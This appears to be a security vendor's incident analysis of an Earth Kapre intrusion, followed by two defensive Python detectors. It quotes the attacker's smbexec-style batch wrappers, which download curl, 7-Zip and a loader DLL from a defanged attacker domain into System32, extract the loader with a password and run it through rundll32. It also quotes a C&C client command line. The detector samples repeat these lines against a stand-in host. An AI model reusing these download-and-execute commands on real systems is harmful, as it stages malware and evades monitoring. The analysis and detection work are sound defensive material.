After examining the events around the time the file was created, we discovered that the threat actor executed the following actions:
We observed that the initial command uses PowerShell to download a file (curl.tmp) from the URL http://preston[.]melaniebest[.]com/ms/curl.tmp and save it as curl.exe in the C:\Windows\System32 directory. For the purposes of this analysis we will use this domain, but the same analysis should hold for the other domains in the previously mentioned list of URLs. Curl.exe is a command-line tool and library for transferring data with URLs. While it is a legitimate tool, it can also be abused by threat actors for malicious purposes.
%COMSPEC% /Q /c echo powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat
Next, 7za.tmp was downloaded and saved as 7za.exe in the C:\Windows\System32 directory. 7za.exe is a copy of 7-Zip, a popular open-source file compression and archiving utility.
C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat
The Earth Kapre loader was then downloaded with curl.exe from the same domain, http://preston[.]melaniebest[.]com/ms/ms.tmp, and saved as ms.dll (on some machines the file name used was ps.dll) in the C:\Windows\System32 directory. As in the previous commands, the threat actors used echo and redirected its output into a batch file, a commonly employed obfuscation technique: by echoing the command into a batch file, they could dynamically generate and execute commands, making the activity harder to analyze or detect. Temporary batch files also let them automate tasks and more easily evade security monitoring. We observed that the threat actors deleted the batch file afterward to cover their tracks.
C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\ms.dll http://preston[.]melaniebest[.]com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\DFMPAa.bat
Since ms.tmp is an archive, the threat actors needed the previously downloaded 7za.exe (7-Zip) to extract its contents, using the password "123".
C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA
Rundll32.exe was then used to execute ms.dll on the machine (in some machines, ps.dll was executed).
%COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat
The Python script was crafted to establish outbound communication and execute remote commands using Server Message Block (SMB) via port 445. During the execution of the script named client.py, an external IP address, 198[.]252[.]101[.]86, is passed as a command-line argument, suggesting its potential role as a C&C server.
"C:\Users\<username>\AppData\Roaming\MUIService\pythonw.exe" C:\Users\<username>\AppData\Roaming\MUIService\rpv\client.py --server-ip 198[.]252[.]101[.]86 --server-port 41808
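A workstation opening SMB (TCP 445) or an arbitrary high port to an address outside the organization is the network-side signal for the client.py behaviour described above. The following flow check is an added example for this write-up, not code from the original post or from the tooling it describes. The flow records are constructed; the public address 198.51.100.86 is a TEST-NET placeholder standing in for the defanged C&C address, 41808 is the server port from the command line above, and the internal ranges are assumed to be the RFC 1918 networks plus loopback.

```python
import ipaddress

# Assumed internal address space: RFC 1918 plus loopback. Adjust to the
# organization's real ranges; Python's is_private is deliberately not used
# because it also treats the TEST-NET documentation ranges as non-global.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]

# Constructed flow records: (source IP, destination IP, destination port).
SAMPLE_FLOWS = [
    ("10.20.30.40", "198.51.100.86", 445),    # SMB straight to a public address
    ("10.20.30.40", "198.51.100.86", 41808),  # the custom server port from the command line
    ("10.20.30.40", "10.20.30.5", 445),       # SMB to the internal file server: expected
    ("10.20.30.40", "203.0.113.10", 443),     # ordinary HTTPS egress
    ("10.20.30.41", "203.0.113.10", 41808),   # another host reaching out on the watched port
]

# SMB, plus the non-standard port passed to client.py above.
WATCHED_PORTS = {445, 41808}


def is_internal(ip: str) -> bool:
    """True when the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_external_flows(flows, watched_ports=WATCHED_PORTS):
    """Return (src, dst, port, reason) for internal hosts reaching public
    addresses on a watched port. Internal-to-internal SMB is left alone."""
    hits = []
    for src, dst, port in flows:
        if port in watched_ports and is_internal(src) and not is_internal(dst):
            if port == 445:
                reason = "outbound SMB to a public address"
            else:
                reason = f"outbound connection on watched port {port}"
            hits.append((src, dst, port, reason))
    return hits


if __name__ == "__main__":
    for src, dst, port, reason in flag_external_flows(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{port}  {reason}")
```

Outbound SMB from a workstation to the internet has almost no legitimate use, so a perimeter rule that blocks TCP 445 egress and logs the attempt both prevents this channel and produces the alert; the port-41808 match is only meaningful while that indicator stays current.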
The presence of Impacket
Impacket is an open-source collection of Python classes for constructing and manipulating network protocols. Impacket activity was detected in the organization's network, indicating that it was used to interact with Windows network protocols. The observed command lines align with Impacket's smbexec script, which provides a semi-interactive shell over SMB. Threat actors are drawn to Impacket's versatility and exploit its capabilities for unauthorized command execution, as highlighted in this blog entry.
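The wrapper repeated in every command above (echo the payload command, redirect its stdout and stderr to a file on the localhost admin share, write that into a temporary .bat, run it, delete it) is the smbexec shape a defender can key on in process-creation telemetry, and it survives the random file names used here in place of stock smbexec's __output and execute.bat. The detector below is an added example written for this analysis, not code from the original post or from the Impacket project. Its sample command lines are constructed to mirror the chain described above (backslashes restored, the download domain replaced by the placeholder attacker.example), and the indicator weights and threshold are arbitrary tuning choices for the example. It also scores the surrounding steps the post describes: a download utility writing into System32, a password-protected 7-Zip extraction, and rundll32 calling an export of a DLL under System32.

```python
import re

# Structural signature of an smbexec-style wrapper: "echo <cmd> ^> \\127.0.0.1\<share>$\<file>
# 2^>^&1 > <temp>\<name>.bat". Keys on the shape, not the (randomized) names.
SMBEXEC_WRAPPER = re.compile(
    r"echo .+?\^>\s*\\\\127\.0\.0\.1\\[A-Za-z]\$\\\S+\s+2\^>\^&1\s*>\s*"
    r"(?P<bat>(?:%TEMP%|[A-Za-z]:\\Windows\\TEMP)\\\S+\.bat)",
    re.IGNORECASE,
)
# A download utility writing its output file into System32 (curl.tmp -> curl.exe, etc.).
SYSTEM32_DROP = re.compile(
    r"(?:iwr|Invoke-WebRequest|curl(?:\.exe)?)\b.*?(?:-OutFile|-o)\s+[A-Za-z]:\\Windows\\System32\\\S+",
    re.IGNORECASE,
)
# 7-Zip extraction with an inline password, as used to unpack the loader archive.
PASSWORD_EXTRACT = re.compile(r"\b7za?(?:\.exe)?\s+x\b.*?\s-p\S+", re.IGNORECASE)
# rundll32 invoking an export of a DLL under System32. Weak alone (many legitimate
# uses), so it only adds weight when combined with the other indicators.
RUNDLL32_SYSTEM32 = re.compile(
    r"rundll32(?:\.exe)?\s+[A-Za-z]:\\Windows\\System32\\\S+\.dll,\w+", re.IGNORECASE
)

WEIGHTS = {  # arbitrary tuning values chosen for this example
    "smbexec_wrapper": 5,
    "self_cleanup": 1,
    "system32_drop": 3,
    "password_extract": 2,
    "rundll32_system32_dll": 1,
}
SUSPICIOUS_THRESHOLD = 5

# Constructed process-creation command lines: four modelled on the chain above,
# then three benign controls the detector should leave alone.
SAMPLE_CMDLINES = [
    r'%COMSPEC% /Q /c echo powershell -c "iwr -Uri http://attacker.example/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat',
    r'C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe http://attacker.example/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat',
    r'C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA.bat',
    r'%COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat',
    r'C:\Windows\system32\cmd.exe /c echo build ok > %TEMP%\build.log',
    r'curl.exe -o C:\Users\alice\Downloads\report.pdf https://intranet.example/report.pdf',
    r'rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL',
]


def analyze(cmdline: str) -> dict:
    """Score one command line and return the indicators it matched."""
    indicators = []
    batch_file = None
    m = SMBEXEC_WRAPPER.search(cmdline)
    if m:
        indicators.append("smbexec_wrapper")
        batch_file = m.group("bat")
        # The same command line also deletes the batch file it just wrote and ran.
        if re.search(r"\bdel\s+" + re.escape(batch_file) + r"\b", cmdline, re.IGNORECASE):
            indicators.append("self_cleanup")
    if SYSTEM32_DROP.search(cmdline):
        indicators.append("system32_drop")
    if PASSWORD_EXTRACT.search(cmdline):
        indicators.append("password_extract")
    if RUNDLL32_SYSTEM32.search(cmdline):
        indicators.append("rundll32_system32_dll")
    score = sum(WEIGHTS[i] for i in indicators)
    return {
        "indicators": indicators,
        "batch_file": batch_file,
        "score": score,
        "suspicious": score >= SUSPICIOUS_THRESHOLD,
    }


def scan(cmdlines):
    """Run analyze() over a batch of command lines and keep the suspicious ones."""
    hits = []
    for cmdline in cmdlines:
        result = analyze(cmdline)
        if result["suspicious"]:
            hits.append((cmdline, result))
    return hits


if __name__ == "__main__":
    for cmdline, result in scan(SAMPLE_CMDLINES):
        print(f"score={result['score']:>2} {result['indicators']}  bat={result['batch_file']}")
```

Because the wrapper alone crosses the threshold, the rule still fires when the payload command is something innocuous-looking, which is the point: on a workstation, a cmd.exe child of a service process writing batch files into TEMP and redirecting output to \\127.0.0.1\C$ has no normal explanation. The batch_file field is returned so a responder can pivot to file-creation and deletion events for that path, which the self-cleanup step would otherwise hide.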